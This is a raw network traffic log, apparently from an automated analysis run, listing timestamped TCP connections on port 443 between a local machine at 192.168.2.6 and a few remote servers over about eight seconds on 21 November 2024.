                                                                                                                                                                        Nov 21, 2024 10:38:58.920165062 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.935446024 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.938647032 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.938730001 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.938803911 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.938822031 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.938838005 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.938843966 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.941567898 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.941623926 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.941690922 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.941831112 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.941845894 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.371251106 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.374793053 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.374861002 CET50051443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.374897957 CET50051443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.374922991 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.374938011 CET50051443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.374943972 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.378020048 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.378086090 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.378173113 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.378302097 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.378338099 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.585059881 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.588376045 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.588407993 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.588824987 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.588829994 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.622473001 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.623131037 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.623167992 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.623596907 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.623605967 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.958652973 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.961308002 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.961337090 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:59.961869001 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:59.961875916 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.031584024 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.031614065 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.031672001 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.031672001 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.031883001 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.031932116 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.031946898 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.031956911 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.031961918 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.034939051 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.034982920 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.035073996 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.035228014 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.035233021 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.066082954 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.069382906 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.069485903 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.069485903 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.069485903 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.072026968 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.072071075 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.072201014 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.072326899 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.072341919 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.266053915 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:39:00.297033072 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.297092915 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.387916088 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.388042927 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:39:00.393429041 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.397058010 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.397125959 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.397181034 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.397192955 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.397211075 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.397217035 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.400044918 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.400089979 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.400165081 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.400307894 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.400319099 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.724191904 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.724689960 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.724745989 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.725163937 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:00.725183964 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.907721996 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:00.907768011 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:00.907972097 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:00.908094883 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:00.908109903 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.157143116 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.157732010 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.157752037 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.158317089 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.158324003 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.170216084 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.173295021 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.173388004 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.173432112 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.173455954 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.173470974 CET50055443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.173479080 CET4435005513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.176345110 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.176389933 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.176460981 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.176635027 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.176651955 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.600509882 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.603605986 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.603677988 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.603722095 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.603740931 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.603756905 CET50056443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.603764057 CET4435005613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.607069016 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.607105970 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.607281923 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.607372046 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.607384920 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.762218952 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.762775898 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.762808084 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.763343096 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.763348103 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.795629025 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.796147108 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.796184063 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:01.796624899 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:01.796632051 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.118113995 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.118576050 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.118601084 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.119163036 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.119167089 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.205271959 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.205369949 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.205435038 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.205607891 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.205629110 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.205641031 CET50057443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.205647945 CET4435005713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.208619118 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.208664894 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.208735943 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.208908081 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.208920002 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.234066963 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.234132051 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.234200954 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.234700918 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.234721899 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.234738111 CET50058443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.234745979 CET4435005813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.237760067 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.237785101 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.237853050 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.238018036 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.238027096 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.354161978 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.357580900 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:02.357594013 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.357928991 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.359049082 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:02.359102011 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.406605005 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:02.553759098 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.557296991 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.557387114 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.557424068 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.557424068 CET50059443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.557444096 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.557455063 CET4435005913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.560180902 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.560269117 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.560350895 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.560487032 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.560522079 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.963783979 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.964817047 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.964848995 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:02.965235949 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:02.965243101 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.407104969 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.410581112 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.410674095 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.410727978 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.410887003 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.410887957 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.410887957 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.413600922 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.413644075 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.413753033 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.413938999 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.413952112 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.495178938 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.498066902 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.498086929 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.498435974 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.498440981 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.719119072 CET50061443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.719161987 CET4435006113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.932841063 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.942737103 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.942780972 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.946790934 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.946820021 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.948723078 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.951945066 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.952064037 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.957633018 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.957639933 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.957658052 CET50062443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.957662106 CET4435006213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.992703915 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.992752075 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:03.992852926 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.996150017 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:03.996180058 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.061206102 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.065913916 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.065953970 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.069680929 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.069691896 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.369951010 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.373156071 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.373226881 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.373295069 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.373346090 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.373399973 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.373469114 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.373507023 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.373533010 CET50063443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.373547077 CET4435006313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.376784086 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.376844883 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.376923084 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.377074957 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.377103090 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.410860062 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.411360025 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.411377907 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.411828995 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.411838055 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.506302118 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.509470940 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.509602070 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.509648085 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.509664059 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.509677887 CET50064443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.509684086 CET4435006413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.512423992 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.512456894 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.512528896 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.512658119 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.512669086 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.864538908 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.867562056 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.867619038 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.867691994 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.867824078 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.867866039 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.867893934 CET50065443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.867909908 CET4435006513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.870760918 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.870812893 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:04.870892048 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.871066093 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:04.871078014 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.148216009 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.153995037 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.154016972 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.154731989 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.154736042 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.581789017 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.585370064 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.587613106 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.587639093 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.587650061 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.587662935 CET50066443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.587667942 CET4435006613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.590293884 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.590331078 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.590414047 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.590590954 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.590600014 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.790097952 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.790605068 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.790643930 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:05.791088104 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:05.791094065 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.095154047 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.095896959 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.095964909 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.096352100 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.096366882 CET4435006813.107.246.60192.168.2.6
